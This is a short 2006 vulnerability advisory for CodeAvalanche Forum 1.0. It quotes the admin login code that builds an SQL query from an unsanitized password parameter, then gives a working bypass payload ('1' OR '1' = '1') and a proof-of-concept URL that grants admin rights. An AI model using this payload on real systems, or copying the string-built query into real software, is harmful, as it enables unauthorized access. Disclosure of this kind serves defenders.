CA Forum Remote SQL Injection
------------------------------------------------------------------
- CAForum 1.0 Remote SQL Injection -
-= http://colander.altervista.org/advisory/CAForum.txt =-
------------------------------------------------------------------
-= CodeAvalanche Forum Version 1.0 =-
Omnipresent
june 01, 2006
Vunerability(s):
----------------
SQL Injection
Product:
--------
CodeAvalanche Forum Version 1.0
Vendor:
--------
http://www.truecontent.info/codeavalanche/asp-forum-script.php
Description of product:
-----------------------
CodeAvalanche FreeForum is asp forum application which allows free posting,
there is no needs for registration of your
visitors. Administrator can add unlimited number of forum categories.
Vulnerability / Exploit:
------------------------
In the file default.asp in Admin directory is vulnerable to an Remote SQL
Injection Attack.
A malicious people can gain Admin rights by putting rights parameters in the
Password Variable.
Let's Check the source code:
<% Response.Buffer = True
userLogged=false
If Request("Password")<>"" Then
'response.Write(Request("Password"))
'response.flush
dim rsUser,selectSQL
selectSQL="SELECT * FROM PARAMS where PASSWORD='" & Request("Password") & "'"
[...]
[End default.asp]
As you can see the variable Password is not properly sanitized before be used,
so an attacker can put this string in the
password field:
1' OR '1' = '1
So, the query will be:
selectSQL="SELECT * FROM PARAMS where PASSWORD='1' OR '1' = '1'
And you can gain access to the application with admin rights.
PoC / Proof of Concept of SQL Injection:
----------------------------------------
This is a simple Proof Of Concept used on my local machine:
http://127.0.0.1/[Application_Path]/[CAForum]/admin/default.asp?password=1'%20OR%20'1'%20=%20'1
Vendor Status
-------------
Not informed!
Credits:
--------
omnipresent
omnipresent@xxxxxxxx